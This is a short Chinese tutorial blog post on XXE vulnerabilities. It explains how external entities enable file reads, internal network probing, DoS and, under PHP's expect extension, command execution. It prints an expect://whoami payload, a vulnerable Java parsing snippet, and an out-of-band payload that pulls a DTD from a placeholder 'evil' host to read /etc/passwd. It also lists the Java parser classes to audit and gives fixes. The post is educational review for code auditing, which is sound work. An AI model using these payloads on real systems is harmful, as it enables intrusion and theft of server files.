基础漏洞之xxe漏洞

今天看了两个小时的代码，就发现一点xxe注入的痕迹（还没有验证），然后顺带复习一下。

我以为的xxe这个漏洞本身能命令执行。结果并不是0-0

漏洞原理

XXE在允许引入外部实体并且对外部实体解析成功的情况下，可以用于进行多种攻击，包括：

• DoS攻击：通过外部实体导致服务拒绝。

• 内网探测：探索内部网络结构。

• 文件读取：获取服务器文件系统上的敏感文件。

对于命令执行，需要特定环境的配合。例如，在PHP环境下，需要开启expect扩展：

<!-- 需要 PHP 开启 expect 扩展 -->
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE creds [
    <!ENTITY goodies SYSTEM "expect://whoami">
]>
<creds>&goodies;</creds>

攻击结果

攻击结果可以分为有回显和无回显两种。

• 有回显：代码从解析后的XML文档中读取数据（可能包含外部实体的内容）并将其输出。例如：

  DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
  DocumentBuilder builder = factory.newDocumentBuilder();
  
  // 解析XML数据
  Document document = builder.parse(new InputSource(new StringReader(xmlData)));
  
  // 获取根元素
  String name = document.getDocumentElement().getTextContent();
  
  // 输出根元素内容（预期包含/etc/passwd文件的内容）
  System.out.println("根元素内容: " + name);
  

• 无回显：读取解析后的元素并进行进一步处理，但不在页面上显示。

无回显的解决办法：利用数据外带

带外数据通道的建立使用嵌套实体声明，通过外部实体的URL发出访问，从而与攻击者的服务器建立联系。实体声明通常放在攻击者的服务器上：

<?xml version="1.0"?>
<!DOCTYPE a [
    <!ENTITY %b SYSTEM "http://evil.dtd">
]>
<a>%b;</a>

evil.dtd内容：

<!ENTITY b SYSTEM "file:///etc/passwd">

漏洞关键词

javax.xml.parsers.DocumentBuilderFactory;
javax.xml.parsers.SAXParser
javax.xml.transform.TransformerFactory
javax.xml.validation.Validator
javax.xml.validation.SchemaFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.transform.sax.SAXSource
org.xml.sax.XMLReader
org.xml.sax.helpers.XMLReaderFactory
org.dom4j.io.SAXReader
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder
javax.xml.bind.Unmarshaller
javax.xml.xpath.XpathExpression
javax.xml.stream.XMLStreamReader
org.apache.commons.digester3.Digester

修复方式

禁止外部实体：如setExpandEntityReferences(false) ；很多解析xml库都有类似参数可以设置

过滤用户提交的XML数据：关键词：<!DOCTYPE 和 <!ENTITY 或者 SYSTEM和PUBLIC……

溜^0  又水一篇

原文始发于微信公众号（天才少女Alpha）：基础漏洞之xxe漏洞